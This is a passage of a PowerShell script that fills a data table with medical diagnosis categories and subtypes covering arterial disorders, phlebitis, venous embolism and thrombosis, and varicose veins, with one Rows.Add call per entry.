$DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Rupture of artery") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Arterial fibromuscular dysplasia") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Celiac artery compression syndrome") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Necrosis of artery") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Arteritis, unspecified") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of unspecified artery") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of carotid artery") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of iliac artery") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of renal artery") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of vertebral artery") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of other precerebral arteries") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of artery of upper extremity") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of artery of lower extremity") + $null = $DiagnosisList.Rows.Add("Other arterial dissection","Dissection of other specified artery") + $null = $DiagnosisList.Rows.Add("Aortic ectasia","Thoracic aortic ectasia") + $null = $DiagnosisList.Rows.Add("Aortic ectasia","Abdominal aortic ectasia") + $null = $DiagnosisList.Rows.Add("Aortic ectasia","Thoracoabdominal aortic ectasia") + $null = $DiagnosisList.Rows.Add("Aortic ectasia","Aortic ectasia, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of arteries and arterioles","Other specified disorders of arteries and arterioles") + $null = $DiagnosisList.Rows.Add("Disorder of arteries and arterioles, unspecified","Disorder of arteries and arterioles, unspecified") + $null = $DiagnosisList.Rows.Add("Diseases of capillaries","Hereditary hemorrhagic telangiectasia") + $null = $DiagnosisList.Rows.Add("Diseases of capillaries","Nevus, non-neoplastic") + $null = $DiagnosisList.Rows.Add("Diseases of capillaries","Other diseases of capillaries") + $null = $DiagnosisList.Rows.Add("Diseases of capillaries","Disease of capillaries, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of arteries, arterioles and capillaries in diseases classified elsewhere","Aneurysm of aorta in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Disorders of arteries, arterioles and capillaries in diseases classified elsewhere","Aortitis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Disorders of arteries, arterioles and capillaries in diseases classified elsewhere","Other disorders of arteries, arterioles and capillaries in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of superficial vessels of lower extremities","Phlebitis and thrombophlebitis of superficial vessels of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of superficial vessels of lower extremities","Phlebitis and thrombophlebitis of superficial vessels of right lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of superficial vessels of lower extremities","Phlebitis and thrombophlebitis of superficial vessels of left lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of superficial vessels of lower extremities","Phlebitis and thrombophlebitis of superficial vessels of lower extremities, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of femoral vein","Phlebitis and thrombophlebitis of unspecified femoral vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of femoral vein","Phlebitis and thrombophlebitis of right femoral vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of femoral vein","Phlebitis and thrombophlebitis of left femoral vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of femoral vein","Phlebitis and thrombophlebitis of femoral vein, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of unspecified deep vessels of lower extremities","Phlebitis and thrombophlebitis of unspecified deep vessels of right lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of unspecified deep vessels of lower extremities","Phlebitis and thrombophlebitis of unspecified deep vessels of left lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of unspecified deep vessels of lower extremities","Phlebitis and thrombophlebitis of unspecified deep vessels of lower extremities, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of unspecified deep vessels of lower extremities","Phlebitis and thrombophlebitis of unspecified deep vessels of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of iliac vein","Phlebitis and thrombophlebitis of right iliac vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of iliac vein","Phlebitis and thrombophlebitis of left iliac vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of iliac vein","Phlebitis and thrombophlebitis of iliac vein, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of iliac vein","Phlebitis and thrombophlebitis of unspecified iliac vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of popliteal vein","Phlebitis and thrombophlebitis of right popliteal vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of popliteal vein","Phlebitis and thrombophlebitis of left popliteal vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of popliteal vein","Phlebitis and thrombophlebitis of popliteal vein, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of popliteal vein","Phlebitis and thrombophlebitis of unspecified popliteal vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of tibial vein","Phlebitis and thrombophlebitis of right tibial vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of tibial vein","Phlebitis and thrombophlebitis of left tibial vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of tibial vein","Phlebitis and thrombophlebitis of tibial vein, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of tibial vein","Phlebitis and thrombophlebitis of unspecified tibial vein") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of other deep vessels of lower extremities","Phlebitis and thrombophlebitis of other deep vessels of right lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of other deep vessels of lower extremities","Phlebitis and thrombophlebitis of other deep vessels of left lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of other deep vessels of lower extremities","Phlebitis and thrombophlebitis of other deep vessels of lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of other deep vessels of lower extremities","Phlebitis and thrombophlebitis of other deep vessels of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of lower extremities, unspecified","Phlebitis and thrombophlebitis of lower extremities, unspecified") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of other sites","Phlebitis and thrombophlebitis of other sites") + $null = $DiagnosisList.Rows.Add("Phlebitis and thrombophlebitis of unspecified site","Phlebitis and thrombophlebitis of unspecified site") + $null = $DiagnosisList.Rows.Add("Portal vein thrombosis","Portal vein thrombosis") + $null = $DiagnosisList.Rows.Add("Other venous embolism and thrombosis","Budd-Chiari syndrome") + $null = $DiagnosisList.Rows.Add("Other venous embolism and thrombosis","Thrombophlebitis migrans") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superior vena cava","Acute embolism and thrombosis of superior vena cava") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superior vena cava","Chronic embolism and thrombosis of superior vena cava") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of inferior vena cava","Acute embolism and thrombosis of inferior vena cava") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of inferior vena cava","Chronic embolism and thrombosis of inferior vena cava") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other thoracic veins","Acute embolism and thrombosis of other thoracic veins") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other thoracic veins","Chronic embolism and thrombosis of other thoracic veins") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of renal vein","Embolism and thrombosis of renal vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of lower extremity","Acute embolism and thrombosis of unspecified deep veins of right lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of lower extremity","Acute embolism and thrombosis of unspecified deep veins of left lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of lower extremity","Acute embolism and thrombosis of unspecified deep veins of lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of lower extremity","Acute embolism and thrombosis of unspecified deep veins of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of femoral vein","Acute embolism and thrombosis of right femoral vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of femoral vein","Acute embolism and thrombosis of left femoral vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of femoral vein","Acute embolism and thrombosis of femoral vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of femoral vein","Acute embolism and thrombosis of unspecified femoral vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of iliac vein","Acute embolism and thrombosis of right iliac vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of iliac vein","Acute embolism and thrombosis of left iliac vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of iliac vein","Acute embolism and thrombosis of iliac vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of iliac vein","Acute embolism and thrombosis of unspecified iliac vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of popliteal vein","Acute embolism and thrombosis of right popliteal vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of popliteal vein","Acute embolism and thrombosis of left popliteal vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of popliteal vein","Acute embolism and thrombosis of popliteal vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of popliteal vein","Acute embolism and thrombosis of unspecified popliteal vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of tibial vein","Acute embolism and thrombosis of right tibial vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of tibial vein","Acute embolism and thrombosis of left tibial vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of tibial vein","Acute embolism and thrombosis of tibial vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of tibial vein","Acute embolism and thrombosis of unspecified tibial vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of other specified deep vein of lower extremity","Acute embolism and thrombosis of other specified deep vein of right lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of other specified deep vein of lower extremity","Acute embolism and thrombosis of other specified deep vein of left lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of other specified deep vein of lower extremity","Acute embolism and thrombosis of other specified deep vein of lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of other specified deep vein of lower extremity","Acute embolism and thrombosis of other specified deep vein of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of proximal lower extremity","Acute embolism and thrombosis of unspecified deep veins of right proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of proximal lower extremity","Acute embolism and thrombosis of unspecified deep veins of left proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of proximal lower extremity","Acute embolism and thrombosis of unspecified deep veins of proximal lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of proximal lower extremity","Acute embolism and thrombosis of unspecified deep veins of unspecified proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of distal lower extremity","Acute embolism and thrombosis of unspecified deep veins of right distal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of distal lower extremity","Acute embolism and thrombosis of unspecified deep veins of left distal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of distal lower extremity","Acute embolism and thrombosis of unspecified deep veins of distal lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified deep veins of distal lower extremity","Acute embolism and thrombosis of unspecified deep veins of unspecified distal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of lower extremity","Chronic embolism and thrombosis of unspecified deep veins of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of lower extremity","Chronic embolism and thrombosis of unspecified deep veins of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of lower extremity","Chronic embolism and thrombosis of unspecified deep veins of lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of lower extremity","Chronic embolism and thrombosis of unspecified deep veins of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of femoral vein","Chronic embolism and thrombosis of right femoral vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of femoral vein","Chronic embolism and thrombosis of left femoral vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of femoral vein","Chronic embolism and thrombosis of femoral vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of femoral vein","Chronic embolism and thrombosis of unspecified femoral vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of iliac vein","Chronic embolism and thrombosis of right iliac vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of iliac vein","Chronic embolism and thrombosis of left iliac vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of iliac vein","Chronic embolism and thrombosis of iliac vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of iliac vein","Chronic embolism and thrombosis of unspecified iliac vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of popliteal vein","Chronic embolism and thrombosis of right popliteal vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of popliteal vein","Chronic embolism and thrombosis of left popliteal vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of popliteal vein","Chronic embolism and thrombosis of popliteal vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of popliteal vein","Chronic embolism and thrombosis of unspecified popliteal vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of tibial vein","Chronic embolism and thrombosis of right tibial vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of tibial vein","Chronic embolism and thrombosis of left tibial vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of tibial vein","Chronic embolism and thrombosis of tibial vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of tibial vein","Chronic embolism and thrombosis of unspecified tibial vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of other specified deep vein of lower extremity","Chronic embolism and thrombosis of other specified deep vein of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of other specified deep vein of lower extremity","Chronic embolism and thrombosis of other specified deep vein of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of other specified deep vein of lower extremity","Chronic embolism and thrombosis of other specified deep vein of lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of other specified deep vein of lower extremity","Chronic embolism and thrombosis of other specified deep vein of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of proximal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of right proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of proximal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of left proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of proximal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of proximal lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of proximal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of unspecified proximal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of distal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of right distal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of distal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of left distal lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of distal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of distal lower extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified deep veins of distal lower extremity","Chronic embolism and thrombosis of unspecified deep veins of unspecified distal lower extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified veins of upper extremity","Acute embolism and thrombosis of unspecified veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified veins of upper extremity","Acute embolism and thrombosis of unspecified veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified veins of upper extremity","Acute embolism and thrombosis of unspecified veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of unspecified veins of upper extremity","Acute embolism and thrombosis of unspecified veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of superficial veins of upper extremity","Acute embolism and thrombosis of superficial veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of superficial veins of upper extremity","Acute embolism and thrombosis of superficial veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of superficial veins of upper extremity","Acute embolism and thrombosis of superficial veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of superficial veins of upper extremity","Acute embolism and thrombosis of superficial veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of deep veins of upper extremity","Acute embolism and thrombosis of deep veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of deep veins of upper extremity","Acute embolism and thrombosis of deep veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of deep veins of upper extremity","Acute embolism and thrombosis of deep veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of deep veins of upper extremity","Acute embolism and thrombosis of deep veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified veins of upper extremity","Chronic embolism and thrombosis of unspecified veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified veins of upper extremity","Chronic embolism and thrombosis of unspecified veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified veins of upper extremity","Chronic embolism and thrombosis of unspecified veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of unspecified veins of upper extremity","Chronic embolism and thrombosis of unspecified veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of superficial veins of upper extremity","Chronic embolism and thrombosis of superficial veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of superficial veins of upper extremity","Chronic embolism and thrombosis of superficial veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of superficial veins of upper extremity","Chronic embolism and thrombosis of superficial veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of superficial veins of upper extremity","Chronic embolism and thrombosis of superficial veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of deep veins of upper extremity","Chronic embolism and thrombosis of deep veins of right upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of deep veins of upper extremity","Chronic embolism and thrombosis of deep veins of left upper extremity") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of deep veins of upper extremity","Chronic embolism and thrombosis of deep veins of upper extremity, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of deep veins of upper extremity","Chronic embolism and thrombosis of deep veins of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of axillary vein","Acute embolism and thrombosis of right axillary vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of axillary vein","Acute embolism and thrombosis of left axillary vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of axillary vein","Acute embolism and thrombosis of axillary vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of axillary vein","Acute embolism and thrombosis of unspecified axillary vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of axillary vein","Chronic embolism and thrombosis of right axillary vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of axillary vein","Chronic embolism and thrombosis of left axillary vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of axillary vein","Chronic embolism and thrombosis of axillary vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of axillary vein","Chronic embolism and thrombosis of unspecified axillary vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of subclavian vein","Acute embolism and thrombosis of right subclavian vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of subclavian vein","Acute embolism and thrombosis of left subclavian vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of subclavian vein","Acute embolism and thrombosis of subclavian vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of subclavian vein","Acute embolism and thrombosis of unspecified subclavian vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of subclavian vein","Chronic embolism and thrombosis of right subclavian vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of subclavian vein","Chronic embolism and thrombosis of left subclavian vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of subclavian vein","Chronic embolism and thrombosis of subclavian vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of subclavian vein","Chronic embolism and thrombosis of unspecified subclavian vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of internal jugular vein","Acute embolism and thrombosis of right internal jugular vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of internal jugular vein","Acute embolism and thrombosis of left internal jugular vein") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of internal jugular vein","Acute embolism and thrombosis of internal jugular vein, bilateral") + $null = $DiagnosisList.Rows.Add("Acute embolism and thrombosis of internal jugular vein","Acute embolism and thrombosis of unspecified internal jugular vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of internal jugular vein","Chronic embolism and thrombosis of right internal jugular vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of internal jugular vein","Chronic embolism and thrombosis of left internal jugular vein") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of internal jugular vein","Chronic embolism and thrombosis of internal jugular vein, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic embolism and thrombosis of internal jugular vein","Chronic embolism and thrombosis of unspecified internal jugular vein") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superficial veins of lower extremities","Embolism and thrombosis of superficial veins of right lower extremity") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superficial veins of lower extremities","Embolism and thrombosis of superficial veins of left lower extremity") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superficial veins of lower extremities","Embolism and thrombosis of superficial veins of lower extremities, bilateral") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of superficial veins of lower extremities","Embolism and thrombosis of superficial veins of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other specified veins","Acute embolism and thrombosis of other specified veins") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other specified veins","Chronic embolism and thrombosis of other specified veins") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of unspecified vein","Acute embolism and thrombosis of unspecified vein") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of unspecified vein","Chronic embolism and thrombosis of unspecified vein") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer of thigh") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer of calf") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer of ankle") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer other part of foot") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer other part of lower leg") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with ulcer","Varicose veins of unspecified lower extremity with ulcer of unspecified site") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer of thigh") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer of calf") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer of ankle") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer other part of foot") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer other part of lower leg") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with ulcer","Varicose veins of right lower extremity with ulcer of unspecified site") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer of thigh") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer of calf") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer of ankle") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer other part of foot") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer other part of lower leg") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with ulcer","Varicose veins of left lower extremity with ulcer of unspecified site") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with inflammation","Varicose veins of unspecified lower extremity with inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with inflammation","Varicose veins of right lower extremity with inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with inflammation","Varicose veins of left lower extremity with inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of thigh and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of calf and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of ankle and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of heel and midfoot and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer other part of foot and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of other part of lower extremity and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of unspecified lower extremity with both ulcer and inflammation","Varicose veins of unspecified lower extremity with both ulcer of unspecified site and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of thigh and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of calf and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of ankle and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of heel and midfoot and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer other part of foot and inflammation") + 